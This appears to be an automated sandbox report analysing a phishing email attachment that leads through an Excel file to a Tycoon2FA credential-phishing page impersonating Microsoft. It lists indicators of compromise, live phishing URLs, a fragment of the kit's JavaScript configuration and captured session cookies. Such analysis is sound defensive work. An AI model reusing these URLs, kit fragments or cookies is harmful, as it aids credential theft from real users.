Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Confirmation (237 KB).msg

Overview

General Information

Sample name:Payment Confirmation (237 KB).msg
Analysis ID:1550380
MD5:5e2f88d03079fb4e7577e6a638f622a6
SHA1:19900505a99e955e3ec8ac196d03f814fd5e26c9
SHA256:0236aa093f7326b46f646de0508b06bf6fbb8e15a5fada15e238e07cdc0583b5
Infos:

Detection

HTMLPhisher, Tycoon2FA
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Yara detected HtmlPhish10
Yara detected Tycoon 2FA PaaS
Office viewer loads remote template
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Creates a window with clipboard capturing capabilities
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Office Autorun Keys Modification
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 3112 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Payment Confirmation (237 KB).msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 4636 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "6E799949-CC68-4C7D-ACF7-DFDB99ECC467" "1E1CE2FA-2E8B-476D-B466-DDE64F014E37" "3112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • EXCEL.EXE (PID: 6516 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LF0A6GI2\Payment Copy.xlsb" MD5: 4A871771235598812032C822E6F68F19)
      • EXCEL.EXE (PID: 6576 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" /Embedding MD5: 4A871771235598812032C822E6F68F19)
      • chrome.exe (PID: 1856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 2212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1860,i,6018047205410846205,15210405168536307558,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • splwow64.exe (PID: 780 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
{"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\"]"}
SourceRuleDescriptionAuthorStrings
0.24.i.script.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    2.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.5.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
        2.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          2.6.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6516, Protocol: tcp, SourceIp: 192.168.2.18, SourceIsIpv6: false, SourcePort: 49874
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.18, DestinationIsIpv6: false, DestinationPort: 49874, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6516, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T16:54:46.890321+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1849705TCP
            2024-11-06T16:55:24.810125+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1849748TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T16:56:05.166870+010020283713Unknown Traffic192.168.2.184987413.107.246.45443TCP
            2024-11-06T16:56:11.019791+010020283713Unknown Traffic192.168.2.184989113.107.246.45443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://ns.califragilist.com/GDSherpa-bold.woffAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/GDSherpa-bold.woff2Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvhAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0KkgcqAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/xyAq43pQ3AarsEuef30Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/34m8PEW3Ch1AL9UabKKEr8920Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/GDSherpa-regular.woffAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/favicon.icoAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/34ZDG48CiIUIKX2LghMRxuoYEP67110Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/GDSherpa-vf2.woff2Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/GDSherpa-regular.woff2Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/GDSherpa-vf.woff2Avira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefwAvira URL Cloud: Label: phishing
            Source: https://ns.califragilist.com/klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227Avira URL Cloud: Label: phishing
            Source: 2.5.pages.csvMalware Configuration Extractor: Tycoon2FA {"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\"]"}

            Phishing

            barindex
            Source: https://ns.califragilist.com/7PXU/LLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'ns.califragilist.com' does not match the legitimate domain for Microsoft., The URL contains an unusual domain name 'califragilist.com' which is not associated with Microsoft., The presence of input fields related to Microsoft services (Email, phone, or Skype) on a non-Microsoft domain is suspicious., The URL does not contain any direct reference to Microsoft, which is a common tactic in phishing attempts. DOM: 2.6.pages.csv
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 0.24.i.script.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: https://ns.califragilist.com/7PXU/Matcher: Template: microsoft matched
            Source: https://ns.califragilist.com/7PXU/Matcher: Template: captcha matched
            Source: https://ns.califragilist.com/7PXU/Matcher: Template: captcha matched
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Number of links: 0
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Title: does not match URL
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Invalid link: Terms of use
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Invalid link: Privacy & cookies
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Invalid link: Terms of use
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: Invalid link: Privacy & cookies
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: var websitenames = ["godaddy", "okta"];var bes = ["apple.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "x4v5i";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/yf76eadsgqyk5jwh8e6cikxm1akrlkqgnjcdg3iu0lvqlfvh";var gdf = "/ijnorcq8hot8jhdfhfstvn9uw8wiyyzxpyqckowhpuere79tcd120";var odf = "/ghu0zfkhmsupqodymb2ooyzw2vs7uv7vpbg8qab648";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(userage...
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: <input type="password" .../> found
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No favicon
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No favicon
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No favicon
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No favicon
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No <meta name="author".. found
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No <meta name="author".. found
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No <meta name="copyright".. found
            Source: https://ns.califragilist.com/7PXU/HTTP Parser: No <meta name="copyright".. found
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.18:49874 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.18:49892 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.141:443 -> 192.168.2.18:49893 version: TLS 1.2
            Source: Joe Sandbox ViewIP Address: 18.66.147.86 18.66.147.86
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.18:49874 -> 13.107.246.45:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.18:49891 -> 13.107.246.45:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.18:49705
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.18:49748
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1l7r34xy2ECzV4h&MD=O24uwPML HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /share/01jc0wzptpy7bepvzk4ner7dc5 HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rw.js HTTP/1.1Host: r.wdfl.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.marmof.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /build/assets/app-0b1f8530.css HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /build/assets/app-49265ad1.js HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.marmof.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /api/?name=A+J&color=ffffff&background=f34b1d HTTP/1.1Host: ui-avatars.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.marmof.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rw.js HTTP/1.1Host: r.wdfl.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1l7r34xy2ECzV4h&MD=O24uwPML HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /js/script.js HTTP/1.1Host: plausible.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.marmof.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/?name=A+J&color=ffffff&background=f34b1d HTTP/1.1Host: ui-avatars.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff2 HTTP/1.1Host: marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.marmof.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.marmof.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /build/assets/app-49265ad1.js HTTP/1.1Host: app.marmof.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
